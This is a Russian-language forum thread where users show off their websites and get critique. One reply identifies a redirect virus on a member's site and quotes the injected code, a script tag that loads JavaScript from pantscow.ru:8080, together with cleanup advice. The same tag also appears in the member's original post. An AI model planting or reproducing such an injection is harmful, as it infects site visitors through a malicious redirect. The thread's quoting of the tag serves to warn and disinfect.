стас писал(а):CMS,файлы вредоносные,название сайта оставить а файлы удалить
Так удалите... от этого названия сайта не как не поменяется.
стас писал(а):CMS,файлы вредоносные,название сайта оставить а файлы удалить


стас писал(а)::?: каким образом если все заблокировано и логин пароль










vricov писал(а):http://cssupport.ru - Неофициальная Российская поддержка Counter Strike



vricov писал(а):vricov писал(а):http://cssupport.ru - Неофициальная Российская поддержка Counter Strike
Че у меня типа так сильно плохо?

Andreaz писал(а):vricov писал(а):vricov писал(а):http://cssupport.ru - Неофициальная Российская поддержка Counter Strike
Че у меня типа так сильно плохо?
А что хорошо?
Дизайна нет... Шаблон.
Где что-то свое? Где информационный вес сайта?
Вам еще есть к чему стремиться...





vricov писал(а):GooD, боюсь закроют меня за использование пиратских скриптов (мне 13, денег на лицензию нет..)
я тут главный администратор (очень большой портал посвещенный кс
http://money.xclan.ru/index.php

Bl@ck писал(а):Сервис почтовых рассылок. Заглядывайте в гости
http://money.xclan.ru/index.php

Andreaz писал(а):Bl@ck писал(а):Сервис почтовых рассылок. Заглядывайте в гости
http://money.xclan.ru/index.php
http://www.redz.ru/?m=freehosting&navi=3
4.3.
Через недельку думаю...

Bl@ck писал(а):Andreaz писал(а):Bl@ck писал(а):Сервис почтовых рассылок. Заглядывайте в гости
http://money.xclan.ru/index.php
http://www.redz.ru/?m=freehosting&navi=3
4.3.
Через недельку думаю...
Всмысле? оО
Я спам не рассылаю, я сам против спама
Сервис почтовых рассылок.





http://start.era.la2host.ru
еще не доработан


Junkman писал(а):Здраствуйте!
Представляю Вашему вниманию информационный проект BMW MotorSports:
bmw-motorsports.ru - Новости, результаты, статьи, обзоры, фото, видео, медиа и многое другое.
P.S. Прошу посетить сайт заинтересованных, понимающих и разбирающихся людей в этой теме.
///M
^M
<script type="text/javascript" src="http://pantscow.ru:8080/CAD.js"></script>
<!--58636b81871d3ee48e9b589c44f2273c-->

Andreaz писал(а):Junkman писал(а):Здраствуйте!
Представляю Вашему вниманию информационный проект BMW MotorSports:
bmw-motorsports.ru - Новости, результаты, статьи, обзоры, фото, видео, медиа и многое другое.
P.S. Прошу посетить сайт заинтересованных, понимающих и разбирающихся людей в этой теме.
///M
На Вашем сайте расположен вирус-редирект.
К примеру файл maincore.php.
index.php и main.php мы уже вычисли.
Остальные чистить не стали, т.к. увы не хватает времени.
Пример кода инъекции на Вашем сайте:
- Код: Выделить всё
^M
<script type="text/javascript" src="http://pantscow.ru:8080/CAD.js"></script>
<!--58636b81871d3ee48e9b589c44f2273c-->
Проверяйте все свои файлы, удаляйте вредоносный код, меняйте пароли от ФТП.
Так же убедитесь, что используете актуальную версию CMS.



GooD писал(а):Andreaz »
Вопрос. Где обычно этот код прописывается? Внизу или в верху страницы. Или может быть рандомно?

Сейчас этот форум просматривают: нет зарегистрированных пользователей и гости: 1